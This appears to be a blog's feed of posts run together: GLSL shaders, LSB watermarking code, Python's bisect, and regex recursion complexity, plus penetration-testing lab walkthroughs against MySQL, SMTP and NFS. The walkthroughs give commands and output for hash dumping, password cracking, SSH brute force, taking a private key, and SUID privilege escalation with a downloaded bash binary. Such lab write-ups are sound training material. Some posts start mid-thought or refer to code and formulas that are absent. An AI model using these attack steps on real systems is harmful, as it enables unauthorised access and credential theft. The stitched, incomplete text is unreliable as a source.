GLSL Library

GLSL Canvas is a library that allows you to run GLSL shaders in a web environment. It makes it easy to create interactive graphics and visualizations using shader language inside a canvas element with WebGL.

https://github.com/patriciogonzalezvivo/glslCanvas

1<script src="https://cdn.jsdelivr.net/npm/glslCanvas@0.2.6/dist/GlslCanvas.min.js"></script>

ShaderToy -> GLSL Canvas

The original shader we’ll be using was written for ShaderToy, which uses a specific set of uniforms and functions. In GLSL Canvas, we need to adapt the code to use the u_time and u_resolution uniforms provided by the library. The main function will also be adjusted to fit the GLSL Canvas structure.

 1#define iTime u_time
 2#define iResolution vec3(u_resolution, 1.0)
 3uniform float u_time;
 4uniform vec2 u_resolution;
 5
 6//Shadertoy fragment shader main function
 7void mainImage( out vec4 fragColor, in vec2 fragCoord );
 8
 9//GLSL Canvas main function
10void main() {
11    vec4 color = vec4(0.0);
12    mainImage(color, gl_FragCoord.xy);
13    gl_FragColor = color;
14}

HTML Setup

To use GLSL Canvas, you need to include the library in your HTML file and create a canvas element where the shader will be rendered. Here’s a simple setup:

 1<script src="https://cdn.jsdelivr.net/npm/glslCanvas@0.2.6/dist/GlslCanvas.min.js"></script>
 2
 3<textarea id="shaderEditor">
 4    {{ GLSL shader code here }}
 5</textarea>
 6
 7<canvas id="shaderCanvas" style="display:block; width:100%; height:500px;"></canvas>
 8
 9<script>
10const canvas = document.getElementById("shaderCanvas");
11const sandbox = new GlslCanvas(canvas);
12const editor = document.getElementById("shaderEditor");
13
14function resizeCanvasToCSSSize() {
15    const displayWidth = canvas.clientWidth;
16    const displayHeight = canvas.clientHeight;
17
18    // Only update if size changed
19    if (canvas.width !== displayWidth || canvas.height !== displayHeight) {
20      canvas.width = displayWidth;
21      canvas.height = displayHeight;
22    }
23  }
24
25// Resize initially and on window resize
26resizeCanvasToCSSSize();
27sandbox.load(editor.value);
28editor.addEventListener("input", () => {
29    sandbox.load(editor.value);
30});
31</script>

Shader: Spiral

You can edit the values in the textarea below to see how they affect the shader in real-time. The shader creates a colorful spiral effect that changes over time.

I recomend focusing on the width, dis, blur, rep, mul, and ex variables to see how they affect the spiral’s appearance.

The points variable controls the number of points in the spiral.

Original Shader

https://www.shadertoy.com/view/Wct3zX

Watermarking is a technique used to embed information into an image, which can be used for various purposes such as copyright protection, authentication, or non-repudiation. In this guide, we will explore the basics of image watermarking and how you can implement it in your projects.

Why Use Watermarking?

Basic Techniques for Watermarking

1. Visible Watermarking

One of the simplest methods of watermarking is to alter the pixel values of an image. This is usually done for copyright protection or branding purposes. The watermark can be a logo, text, or any other image that is blended with the original image. This type of watermarking is immediately noticeable and can be readily removed by someone with image editing skills, but it serves as a visible deterrent against unauthorized use.

2. Least Significant Bit (LSB) Insertion

Least significant bit insertion is a subset of steganography where a hidden message is imbedded into an image to bypass detection. The simplest method involves modifying the least significant bits (LSBs) of pixel values, which allows for a more robust and imperceptible watermark.

3. Frequency Domain Manipulation

This method involves transforming the image into the frequency domain using techniques like the Discrete Cosine Transform (DCT) or Discrete Wavelet Transform (DWT). Watermarks can then be embedded in the frequency coefficients, which are not visible to the human eye.

These techniques are more complex but provide better security and robustness against attacks such as cropping, resizing, or compression. We will cover the DWT in a more advanced quide.

Least Significant Bit Watermarking

To implement the simplest form of invisible watermarking in your images, you can use the cv2 library in Python to read in the image and modify the last bits of each pixel.

 1import cv2
 2
 3def embed_lsb(image_path, message, output_path):
 4    image = cv2.imread(image_path)
 5    flat = image.flatten()
 6
 7    # Convert message to binary
 8    bits = ''.join([format(ord(i), '08b') for i in message]) + '00000000'  # Null terminator
 9    for i in range(len(bits)):
10        flat[i] = (flat[i] & ~1) | int(bits[i])  # Set LSB
11
12    watermarked = flat.reshape(image.shape)
13    cv2.imwrite(output_path, watermarked)
14
15def extract_lsb(image_path):
16    # Load image and flatten to 1D array
17    image = cv2.imread(image_path).flatten()
18    bits = ""
19    for byte in image:
20        bits += str(byte & 1)  # Get LSB
21
22        # Check every 8 bits for null terminator
23        if len(bits) % 8 == 0:
24            char = chr(int(bits[-8:], 2))
25            if char == '\x00':
26                break
27
28    # Convert full bitstring to characters (excluding null terminator)
29    message = ''.join(
30        chr(int(bits[i:i+8], 2)) for i in range(0, len(bits)-8, 8)
31    )
32    return message
33
34if __name__ == "__main__":
35
36    # Example usage
37    embed_lsb("image.png", "Secret Watermark", "output.png")
38
39    message = extract_lsb("image.png")
40    print("Extracted message:", message)
41
42    message = extract_lsb("output.png")
43    print("Extracted message:", message)

The embed_lsb function will take an image, a message, and an output path to save the watermarked image. The extract_lsb function will read the watermarked image and extract the hidden message. There are simpler was of doing this such as using a dedicated steganography library like stegano, but this example shows how you can implement it from scratch.

Stegano Code Example

 1from stegano import lsb
 2def embed_message(image_path, message, output_path):
 3    # Embed the message in the image
 4    watermarked_image = lsb.hide(image_path, message)
 5    watermarked_image.save(output_path)
 6
 7def extract_message(image_path):
 8    # Extract the message from the image
 9    return lsb.reveal(image_path)
10
11if __name__ == "__main__":
12    embed_message("image.png", "Secret Watermark", "watermarked_image.png")
13    message = extract_message("watermarked_image.png")
14    print("Extracted message:", message)

This is a much simpler way to achieve the same result and it abstracts away the details of how the LSB is manipulated. The stegano library handles the encoding and decoding of messages in images, making it easier to implement watermarking without needing to understand the underlying pixel manipulation. There are also other modules within stegano that allow for more complex watermarking techniques, such as using different color channels or even embedding multiple messages.

Watermarking Example

Reading the Watermark

To read the watermark from an image, you can reverse the process by extracting the pixel values or frequency coefficients where the watermark was embedded. This can be done using similar libraries and techniques as mentioned above.

Using the extract_lsb function

Initial Reconnaissance

The first step in exploiting a MySQL database is identifying whether the target machine has an exposed MySQL port. By default, MySQL runs on port 3306, but this can be customized by the system administrator, so it’s important to scan for common open ports. Typically you can attempt to connect to the MySQL server using common credentials or perform a brute force attack if no rate-limiting is in place.

Example Nmap Scan: (NFS Scan highlighted)

 1root@ip-10-10-22-136:~# IP=10.10.190.97
 2root@ip-10-10-22-136:~# nmap -sS -T4 -F -oN output.txt $IP
 3
 4Starting Nmap 7.60 ( https://nmap.org ) at 2024-10-06 02:34 BST
 5Nmap scan report for ip-10-10-244-95.eu-west-1.compute.internal (10.10.244.95)
 6Host is up (0.0012s latency).
 7Not shown: 998 closed ports
 8PORT     STATE SERVICE
 922/tcp   open  ssh
103306/tcp open  mysql
11MAC Address: 02:59:70:A7:8E:95 (Unknown)
12
13Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds

Using stolen credentials

For this box we already know the credentials of the MySQL server username: root and password:password obtained previously and we’ll be using this to gain further access on the server. Once connected and authenticated using the credentials we can enumerate the database to gather more information about the system.

1root@ip-10-10-22-136:~# username=root
2root@ip-10-10-22-136:~#  mysql -h $IP -u $username -p
3Enter password: password

Enumeration

We’ll be using modules from Metasploit to extract information from the database. First thing we’ll do is submit an authenticated request to show the databases present on the MySQL server. We can do this by setting the RHOSTS, USERNAME, PASSWORD to the ip and credentials of the server and by initiating the SQL show databases query command.

 1msfconsole
 2msf6 > use auxiliary/admin/mysql/mysql_sql
 3msf6 auxiliary(admin/mysql/mysql_sql) > set RHOSTS 10.10.244.95
 4msf6 auxiliary(admin/mysql/mysql_sql) > set USERNAME root
 5msf6 auxiliary(admin/mysql/mysql_sql) > set PASSWORD password
 6msf6 auxiliary(admin/mysql/mysql_sql) > set SQL show databases
 7msf6 auxiliary(admin/mysql/mysql_sql) > options
 8
 9Module options (auxiliary/admin/mysql/mysql_sql):
10
11   Name  Current Setting  Required  Description
12   ----  ---------------  --------  -----------
13   SQL   show databases   yes       The SQL to execute.
14
15
16   Used when connecting via an existing SESSION:
17
18   Name     Current Setting  Required  Description
19   ----     ---------------  --------  -----------
20   SESSION                   no        The session to run this module on
21
22
23   Used when making a new connection via RHOSTS:
24
25   Name      Current Setting  Required  Description
26   ----      ---------------  --------  -----------
27   PASSWORD  password         no        The password for the specified username
28   RHOSTS    10.10.244.95     no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
29   RPORT     3306             no        The target port (TCP)
30   USERNAME  root             no        The username to authenticate as
31
32msf6 auxiliary(admin/mysql/mysql_sql) > run
33
34[*] Running module against 10.10.244.95
35
36[*] 10.10.244.95:3306 - Sending statement: 'show databases'...
37[*] 10.10.244.95:3306 -  | information_schema |
38[*] 10.10.244.95:3306 -  | mysql |
39[*] 10.10.244.95:3306 -  | performance_schema |
40[*] 10.10.244.95:3306 -  | sys |
41[*] Auxiliary module execution completed

Reading MySQL Database

We can further analyze the structure of the MySQL database by dumping the schema of all tables using the Metasploit module mysql_schemadump. This module allows us to retrieve the database schema, which includes detailed information about the structure of the databases, tables, columns, data types, and relationships between different tables within the MySQL server. This information can be critical for targeted exploitation. For example, knowing the names and structures of the tables enables us to focus on tables that likely contain sensitive information, such as users, passwords, sessions, or admin.

 1msf6 > use auxiliary/admin/mysql/mysql_schemadump
 2msf6 auxiliary(admin/mysql/mysql_schemadump) > set RHOSTS 10.10.244.95
 3msf6 auxiliary(admin/mysql/mysql_schemadump) > set USERNAME root
 4msf6 auxiliary(admin/mysql/mysql_schemadump) > set PASSWORD password
 5msf6 auxiliary(admin/mysql/mysql_schemadump) > options
 6
 7Module options (auxiliary/scanner/mysql/mysql_schemadump):
 8
 9   Name             Current Setting  Required  Description
10   ----             ---------------  --------  -----------
11   DISPLAY_RESULTS  true             yes       Display the Results to the Screen
12
13
14   Used when connecting via an existing SESSION:
15
16   Name     Current Setting  Required  Description
17   ----     ---------------  --------  -----------
18   SESSION                   no        The session to run this module on
19
20
21   Used when making a new connection via RHOSTS:
22
23   Name      Current Setting  Required  Description
24   ----      ---------------  --------  -----------
25   PASSWORD  password         no        The password for the specified username
26   RHOSTS    10.10.244.95     no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
27   RPORT     3306             no        The target port (TCP)
28   THREADS   1                yes       The number of concurrent threads (maxone per host)
29   USERNAME  root             no        The username to authenticate as
30
31msf6 auxiliary(admin/mysql/mysql_schemadump) > run
32
33- TableName: x$waits_global_by_latency
34    Columns:
35    - ColumnName: events
36      ColumnType: varchar(128)
37    - ColumnName: total
38      ColumnType: bigint(20) unsigned
39    - ColumnName: total_latency
40      ColumnType: bigint(20) unsigned
41    - ColumnName: avg_latency
42      ColumnType: bigint(20) unsigned
43    - ColumnName: max_latency
44      ColumnType: bigint(20) unsigned
45
46[*] 10.10.244.95:3306 - Scanned 1 of 1 hosts (100% complete)
47[*] Auxiliary module execution completed

MySQL Hashdump

We will also use the mysql_hashdump module which is a powerful tool used to extract password hashes from a MySQL server, which can then be leveraged for further attacks. By using this module, attackers can retrieve hashed password values stored within the MySQL user table, typically located in the user table. In this case we were able to identify the entry carl with its corresponding password hash.

 1msf6 > auxiliary/scanner/mysql/mysql_hashdump
 2msf6 auxiliary(admin/mysql/mysql_hashdump) > set RHOSTS 10.10.244.95
 3msf6 auxiliary(admin/mysql/mysql_hashdump) > set USERNAME root
 4msf6 auxiliary(admin/mysql/mysql_hashdump) > set PASSWORD password
 5msf6 auxiliary(admin/mysql/mysql_hashdump) > options
 6
 7Module options (auxiliary/scanner/mysql/mysql_hashdump):
 8
 9   Used when connecting via an existing SESSION:
10
11   Name     Current Setting  Required  Description
12   ----     ---------------  --------  -----------
13   SESSION                   no        The session to run this module on
14
15
16   Used when making a new connection via RHOSTS:
17
18   Name      Current Setting  Required  Description
19   ----      ---------------  --------  -----------
20   PASSWORD  password         no        The password for the specified username
21   RHOSTS    10.10.244.95     no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
22   RPORT     3306             no        The target port (TCP)
23   THREADS   1                yes       The number of concurrent threads (max one per host)
24   USERNAME  root             no        The username to authenticate as
25
26
27msf6 auxiliary(admin/mysql/mysql_hashdump) > run
28
29[+] 10.10.244.95:3306 - Saving HashString as Loot: root:
30[+] 10.10.244.95:3306 - Saving HashString as Loot: mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
31[+] 10.10.244.95:3306 - Saving HashString as Loot: mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
32[+] 10.10.244.95:3306 - Saving HashString as Loot: debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
33[+] 10.10.244.95:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
34[+] 10.10.244.95:3306 - Saving HashString as Loot: carl:*EA031893AA21444B170FC2162A56978B8CEECE18
35[*] 10.10.244.95:3306 - Scanned 1 of 1 hosts (100% complete)
36[*] Auxiliary module execution completed

Cracking the Hash

We can use John the Ripper, a popular password-cracking tool, to reverse-engineer the hash into its original ASCII format. John the Ripper works by taking the hashed password and comparing it against a large set of potential plaintext passwords, which are hashed in the same algorithm. If it finds a match, it reveals the original password.

1root@ip-10-10-22-136:~# echo carl:*EA031893AA21444B170FC2162A56978B8CEECE18 > hash.txt
2root@ip-10-10-22-136:~# john hash.txt
3
4Proceeding with wordlist:/opt/john/password.lst
5Proceeding with incremental:ASCII
6doggie           (carl)
71g 0:00:00:02 DONE 3/3 (2024-10-06 02:57) 0.4566g/s 1043Kp/s 1043Kc/s 1043KC/s doggie..doggia

Accessing the MySQL Server

Having access to the username and password allows us to SSH directly into the server and gain access to its resources directly.

1root@ip-10-10-22-136:~# ssh carl@10.10.244.95
2carl@10.10.244.95's password: doggie
3
4Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)
5carl@polomysql:~$

Takeaways

• Credential-Based Exploitation: Gaining access to MySQL using known credentials (like root with a weak password) can lead to control over the database and server, emphasizing the importance of strong, unique credentials and limiting root access.

• Metasploit Modules as Recon Tools: Metasploit’s mysql_schemadump and mysql_hashdump modules are effective for looking into database structure and extracting sensitive data like password hashes.

• Importance of Salting: Salting passwords before hashing significantly strengthens security by making brute force and rainbow table attacks impractical, as each password hash becomes unique, removing the effectiveness of tools like John the Ripper. This highlights the importance of using salts in password storage to mitigate hash-cracking attacks.

SMTP Intrusion

Simple Mail Transfer Protocol aka SMTP allows for the process by which mail clients send mail to each other. If we were to compare the email service to the postal delivery service, SMTP would be the courier, delivering mail from the post office to the recipient’s address, except in this case every address is also its own post office. The courier tends to know important information about its sender so we’ll be trying to get as much information out of it as we can. Thankfully the SMTP service is very receptive to questions so we will be able to pry valuable insights from it in order to compromise its server.

Identifying the SMTP Service

The first step of identifying possible attack vectors is running a network Nmap scan to see what ports are open on services that we know how to abuse. In this case we’re looking for port 25 exposing the SMTP service to the internet.

Example Nmap Scan: (NFS Scan highlighted)

 1root@ip-10-10-22-136:~# IP=10.10.190.97
 2root@ip-10-10-22-136:~# nmap -sS -T4 -F -oN output.txt $IP
 3
 4Nmap scan report for ip-10-10-190-97.eu-west-1.compute.internal (10.10.190.97)
 5Host is up (0.00070s latency).
 6Not shown: 998 closed ports
 7PORT   STATE SERVICE
 822/tcp open  ssh
 925/tcp open  smtp
10MAC Address: 02:87:B2:A3:3F:17 (Unknown)
11# Nmap done at Sun Oct  6 01:22:55 2024 -- 1 IP address (1 host up) scanned in 1.68 seconds

Getting the SMTP server metadata

Now that we’ve identified a way in, we can use a pre made SMTP attack script to extract as much valuable metadata we can using the Metasploit smtp_version script. In this case we’re able to extract the smtp server’s domain name but not much else that’s useful. We’ll try a more aggressive script next.

 1msfconsole
 2msf6 > use auxiliary/scanner/smtp/smtp_version
 3msf6 auxiliary(scanner/smtp/smtp_version) > set RHOSTS 10.10.22.136
 4
 5
 6Module options (auxiliary/scanner/smtp/smtp_version):
 7
 8Name     Current Setting  Required  Description
 9----     ---------------  --------  -----------
10RHOSTS   10.10.22.136     yes       The target host(s), see https://docs.metasploit.com/docs/using-me
11                                    tasploit/basics/using-metasploit.html
12RPORT    25               yes       The target port (TCP)
13THREADS  1                yes       The number of concurrent threads (max one per host)
14
15msf6 auxiliary(scanner/smtp/smtp_version) > run
16
17[+] 10.10.190.97:25       - 10.10.190.97:25 SMTP 220 polosmtp.home ESMTP Postfix (Ubuntu)\x0d\x0a
18[*] 10.10.190.97:25       - Scanned 1 of 1 hosts (100% complete)
19[*] Auxiliary module execution completed

Finding the SMTP server exposed usernames

We’ll try to brute force our SMTP courier to get it to tell us who it expects us to be talking to. We’ll keep asking it whether it recognizes the name we give it with a enumeration brute force attack and hopefully we’ll get a match. In this case we were able to tell that the SMTP knows the user “administrator” which gives us valuable insight into a possible user on the system. It is especially exciting to confirm the existence of an administrator user because compromising their account can lead to unrestricted access to their entire server!

 1msf6 auxiliary(scanner/smtp/smtp_version) > use /auxiliary/scanner/smtp/smtp_enum
 2msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 10.10.190.97
 3msf6 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt
 4msf6 auxiliary(scanner/smtp/smtp_enum) > run
 5
 6
 7[*] 10.10.190.97:25       - 10.10.190.97:25 Banner: 220 polosmtp.home ESMTP Postfix (Ubuntu)
 8[+] 10.10.190.97:25       - 10.10.190.97:25 Users found: administrator
 9[*] 10.10.190.97:25       - Scanned 1 of 1 hosts (100% complete)
10[*] Auxiliary module execution completed

Running Hydra to Brute Force the password

This isn’t a very nice way to break into a system but we’ll continue to use the brute force enumeration approach along with the username we found to try to log into the server via ssh. We’ll use the hydra tool to enumerate different passwords until we get one that works.

Luckily there was a direct match and we found a password for the administrator user, if only it was always this simple 😊

1hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.190.97 ssh
2
3[22][ssh] host: 10.10.190.97   login: administrator   password: alejandro
4[STATUS] attack finished for 10.10.190.97 (waiting for children to complete tests)
51 of 1 target successfully completed, 1 valid password found

Logging into the server with credentials

Equipped with a username and password we can easily SSH into the server unless it has other protections in place.

1ssh administrator@10.10.190.97
2administrator@10.10.190.97's password: alejandro
3
4Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-111-generic x86_64)
5
6administrator@polosmtp:~$

Gaining Access Through NFS

Initial Reconnaissance

The first step to Network File System (NFS) exploitation is identifying an exposed NFS share on the target machine. A public NFS share might have insufficient access controls, allowing unauthorized mounting from a remote location. This gives us an initial vector to compromise the vulnerable server.

Example Nmap Scan: (NFS Scan highlighted)

 1root@ip-10-10-71-105:~# IP=10.10.190.97
 2root@ip-10-10-71-105:~# nmap -sS -T4 -F -oN output.txt $IP
 3
 4PORT      STATE SERVICE  VERSION
 522/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 6111/tcp   open  rpcbind  2-4 (RPC #100000)
 72049/tcp  open  nfs_acl  3   (RPC #100227)
 832969/tcp open  mountd   1-3 (RPC #100005)
 933463/tcp open  mountd   1-3 (RPC #100005)
1038233/tcp open  nlockmgr 1-4 (RPC #100021)
1143597/tcp open  mountd   1-3 (RPC #100005)
12
13MAC Address: 02:AE:30:CF:78:25 (Unknown)
14Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
15
16Read data files from: /usr/bin/../share/nmap
17Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
18Nmap done: 1 IP address (1 host up) scanned in 75.34 seconds
19        Raw packets sent: 128591 (5.658MB) | Rcvd: 128591 (5.144MB)

Mounting the Shared Drive

Remotely mounting the server’s NFS share from our attacker machine gains us access to the server’s file system, with its directories and files accessible directly on our device. This allows us to explore the server’s file system, exfiltrate files from the server onto our device and upload our files to the server. These actions will let us grab private information and load malicious files onto the server to further our attack.

1root@ip-10-10-71-105:~# sudo mount -t nfs $IP:home /tmp/mount/ -nolock

SSH Key Extraction

Navigating to the .ssh directory of a remote user on the mounted NFS share we found the user’s SSH private key, which should never be stored on the server itself and should be securely stored on a trusted user machine. Should the server be breached through a vulnerability, the attacker can create a persistent method of entry using the stored private key to pose as a trusted user on future login attempts.

1root@ip-10-10-71-105:~# cd /tmp/mount/cappucino/.ssh
2root@ip-10-10-71-105:/tmp/mount/cappucino/.ssh# cp id_rsa ~
3root@ip-10-10-71-105:/tmp/mount/cappucino/.ssh# cd ~
4root@ip-10-10-71-105:~# chmod 600 id_rsa
5root@ip-10-10-71-105:~# cp id_rsa /$local_folder

SSH Login with Stolen Key

After locating an SSH private key, it is simple to extract it using the NFS server by copying it from the shared drive to a local directory on the attack box. This file allows us to authenticate and gain access to the remote user’s account through SSH, giving us direct access to a user account on the server.

1root@ip-10-10-71-105:~# ssh -i id_rsa cappucino@$IP

Super User Privilege Escalation via SUID Exploit

Uploading Malicious Script

Since we have 2 way connection, we can now upload anything we want to the server through the shared drive connection. We will upload a simple bash executable which we will use to escalate privileges and gain super user access on the server.

1root@ip-10-10-71-105:/tmp/mount/cappucino# wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash

SUID Permission Modification

After placing the script on the target machine we can set its SUID (Set User ID) bit. This allowed the script to run with elevated (root) privileges, regardless of the user executing it.

1root@ip-10-10-71-105:/tmp/mount/cappucino# sudo chmod +sx bash
2root@ip-10-10-71-105:/tmp/mount/cappucino# ls -la bash
3    -rwsr-sr-x 1 root root 1113504 Oct  4 04:42 bash

Escalating to Superuser Privileges

Executed the modified SUID script to escalate privileges from the standard user to the superuser (root). This provided full control over the target system.

1cappucino@polonfs:~$ ./bash -p
2bash-4.4# whoami
3> root

Takeaways

• NFS Security Misconfigurations: Exposed NFS shares without proper access controls can be a critical vulnerability, allowing unauthorized mounting and file access.

• SUID Misconfigurations: SUID permissions on scripts and binaries can be exploited to gain elevated privileges, especially if the target does not enforce proper file permissions.

This fear is completely irrational, and I always kick myself for feeling this way because binary search is beautiful. Given a sorted list you can find the index of any value in log(N) time because you get to cut your search space in half with every lookup.

Precisely this operation allows sorted lists to be very space and time efficient at solving problems requiring lookups as well as determining how many entries are greater or less than your target.

Now if you want to take advantage of your sorted lists you may be tempted to write your own binary search and insert functions like I’ve been doing so far and inevitably it takes a few tries to actually get it working right. Thankfully there’s a built in library that already does the same thing, in a single line and a lot faster too.

Bisect

The bisect library is a tiny one, but it does two things and it does them well; search and insert.

For search we have bisect_left and bisect_right which perform binary search to find where to insert a value right before our target on either the left or right. In the case of bisect_right it will overshoot by one index to show you where you should insert your new value to maintain order.

list: [1,2,3,4,5], target = 4

• bisect_left: [1,2,3, _ , 4,5] index= 3
• bisect_right: [1,2,3,4, _ ,5] index= 3+1

For insertion we have insort_left and insort_right which perform binary insert to actually insert our value on either the left or the right of our target and manipulates our list inplace.

• insort_left: [1,2,3, 4 ,4,5] inserted index= 3
• insort_right: [1,2,3,4, 4 ,5] inserted index= 3+1

Apart from bisect and insort which are equivalent in function to bisect_right and insort_right respectivly, these are the only functions available in this library. However they completely replace the need to write your own functions for lookups and inserts.

Bisect is Fast

 1def binary_search(lst, target):
 2    start, end = 0, len(lst) - 1
 3    while start <= end:
 4        middle = (end+start)//2
 5        if target > lst[middle]:
 6            start = middle + 1
 7        elif target < lst[middle]:
 8            end = middle - 1
 9        else:
10            return middle
11    return -1

And here’s a binary race between it and bisect. We’ll be looking for value 0 because ironically it will take the longest to find with binary search since 0 is never in the middle of anything.

 1#list and target
 2input_list = list(range(1000000))
 3target = 0
 4
 5#my binary search
 6start = time.time()
 7index = binary_search(input_list, target)
 8duration = time.time() - start
 9print("search found {} at index {} in {} seconds".format(target,index,duration))
10
11#bisect binary search
12start = time.time()
13index = bisect.bisect_left(input_list, target)
14if index == len(input_list) or input_list[index] != target:
15    index = -1
16duration = time.time() - start
17print("bisect found {} at index {} in {} seconds".format(target,index,duration))

• search found 0 at index 0 in 1.6927719116210938e-05 seconds
• bisect found 0 at index 0 in 2.6226043701171875e-06 seconds

Here we can see that bisect is 6 times faster than my implementation

Because bisect is implemented in C it is much faster, though both functions use the exact same algorithm. Python is just a lot slower at adding numbers than C because all numbers in Python are actually Integer classes which in turn take time to call their addition functions whereas in C integers are just 4 byte data types and are processed very efficiently by the CPU. The difference in time can start to compound into a tangible boost in performance when you start doing many lookups or insertions sequentially.

Conclusion

Bisect is a small but useful library that helps maintain sorted order in lists as well as providing lookups in a quick and efficient way. Knowing about its existence can save on both implementation and runtime and it is an indespensible tool for many coding interviews where questions about sorted lists tend to crop up from time to time.

The real intrigue was the calculated but unexplained time complexity for one of the inefficient solutions which only used recursion, minus the dynamic programming. After all, dynamic programming makes time and space complexity fairly easy to compute, as long as the solution is correct, it cannot exceed the complexity of all possible subproblems. Before I can get ahead of myself though here’s the outline of the original problem which can also be found here https://leetcode.com/problems/regular-expression-matching/

If at some point I lose you during the explanation please leave a comment so I can make a revision.

The Problem:

Given an input string (s) and a pattern (p), implement regular expression matching with support for '.' and '*'.

1'.' Matches any single character.
2'*' Matches zero or more of the preceding element.

The matching should cover the entire input string (not partial).

Note:

• s could be empty and contains only lowercase letters a-z.
• p could be empty and contains only lowercase letters a-z, and characters like . or *.

Some Examples:

Example 1

1Input:
2s = "abcda"
3p = "ab.d"
4Output: false
5Explanation: The . matches the c but the pattern ends before matching to the entire text.

Example 2

1Input:
2s = "aab"
3p = "c*a*b"
4Output: true
5Explanation: c can be repeated 0 times, a can be repeated 2 times. Therefore, it matches "aab".

Example 3

1Input:
2s = "ab"
3p = ".*"
4Output: true
5Explanation: ".*" means "zero or more (*) of any character (.)".

The examples above summarize the kind of cases you can expect to be dealing with during testing. Because the title of the article is “Solving for Recursive Complexity” and not “How to Solve Recursive Problems” I won’t be going too deeply into how to solve this kind of problem. Instead I will resort to flashing a piece of pseudo code that explains the 3 recursive gates that our algorithm will be passing through on its journey to the end of the piece of text. I’d recommend trying to solve this problem on your own by going to the link I included above, and coming back here once you’ve gained a level of appreciation for this problem, because I’m about to spoil it for you.

Solution Pseudo-code:

Quick Explanation

If you’re not very familiar with recursion, this code block might still look very intimidating. The gist is that we’re only doing two things:

1. checking if the current character of the text matches the pattern and

2. asking if the pattern will match the text if we modify the text a bit or the pattern a bit or both for the remaining characters.

**Line 12: keep_asterisk_match is true if we don’t change the pattern but move along the length of the text (text[1:]). This is how * is dealt with in recursion, we simply move on to the next character of the text like the current one never existed and keep the asterisk in the pattern.

Line 17: skip_asterisk_match is true if the text matches the pattern without the asterisk (pattern[2:]) i.e if we match 0 of the preceding element. Remember in Example 2 where c* didn’t have to match anything, and this is also how we jump out of the keep_asterisk_match trap that we made for ourselves earlier.

Line 20: Once we get an answer for whether we get a match when keeping or skipping the asterisk after keep_asterisk_match and skip_asterisk_match are run we return the result as shown in the OR table below.

Line 24: If we don’t see an asterisk we check if that first character matched the pattern with character_match and we keep recusing by reducing the input text and pattern by that first matched character (text[1:], pattern[1:]) and recursively check if the rest of the string matches.

Line 4: The final part of recursion which ironically is usually defined at the top of the function, is our recursion rock bottom. If we have an empty pattern and an empty string as our inputs, we have the divine knowledge that the pattern will match the string because empty matches empty for sure. If only one of them is empty we know that there’s no match.

Considering the Complexity

The time complexity for this question appears to be difficult to pin down. After all, there are two points of recursion and one full stop. And like I said before, the answer to the complexity is given in the solutions with no further explanations. For text of length T and pattern of length P, with the text being indexed at text[i:] and pattern[2j:], the time complexity for this question is….drum roll

Well, that’s quite something.

Normally you’d expect something like O(T*P) or anything else to that effect and in fact, the solutions do propose a more concise upper bound, again without any explanations (not surprisingly), but we’ll get to that later. For now we have enough on our hands as it is with this piece of work.

Linear vs Exponential Complexity

The reason why the complexity isn’t as simple as it is for something like bubble sort, is because we’re not making linear passes over our text and pattern. Instead we’re doing things recursively, diving deeper and deeper through sections of our text and pattern and revisiting the same sub problems for what can feel like an arbitrary number of times. The reason I bring up bubble sort, which has O(n²) complexity, is because its complexity decreases in the shape of a pyramid as we sort more and more digits.

On the other hand, recursion has the classic shape of a tree due to the multiple places where the function can call itself.

The structures look deceptively similar but the crucial difference is that where the pyramid decreases linearly, the tree grows exponentially. This creates a world of a difference when analyzing time and space complexity.

Our Worst Case

When analyzing worst case complexity we have to think of the worst case input. Because we have two inputs, text and pattern, I will focus on the pattern because one depends on the other and at least for me it’s easier to think of the rules rather than the results. In this question each new character we add to our pattern can be either a .* or . where . can be any character. From the code it should be pretty clear which choice causes more computation. If we include the * character, our code splits into two streams which must both be computed until inevitably they should return whether there’s a match, meanwhile if we are matching a single character the fun stops pretty quickly as we are only taking a single route, linearly.

It looks pretty clear that a worst case pattern would consist of many .* to create as many diverging paths as possible, with a final text character which does or doesn’t match the pattern.

Text: aaaaaaaaaab

Pattern: a*a*a*a*a*a*a*a*a*a*

In this scenario we must get both to the end of the pattern and to the end of the string to determine that there is no match, while branching 2¹⁰ number of times starting from the first index of the text.

Visualizing the Computation

In order to figure out the time complexity we have to find how many times each sub-problem had to be computed. Because we are not saving the result like in dynamic programming this will largely contribute to the exploding runtime. Each sub-problem consists of answering whether text[i:] and pattern[2j:] are a match. We use pattern[2j:] because we are using .* repeatedly in our pattern for the worst case, every time we take the skip_asterisk_matched path we skip one of the .* which take up two spaces. In order to visualize the two branches of skip_asterisk_matched and keep_asterisk_matched we will draw a tree diagram to illustrate all the visited sub-problems. Each node will have the format (i,j) for where the text and pattern are indexed at each point in time.

A quick side note on this, when performing recursion, the algorithm will perform a depth-first search by taking the left path first on each iteration. This doesn’t make much of a difference though because in the worst case we’ll have to traverse the entire tree anyways. Let’s take an example sub-problem where we want to see if text[2:] and pattern[2:] were a match. This will appear as (2,1) on our tree:

i=2 because we are at text[2:] for the text j=1 because we are at pattern[2:] which in the worst case means we have only a single .* asterisk that takes up two spaces. Following pattern[2j:] means j=1.

We can see that this sub-problem had been encountered 3 times during computation. The tree format is good for seeing when these sub-problems will be encountered but it’s not very good at determining how many times that will happen.

Combinations

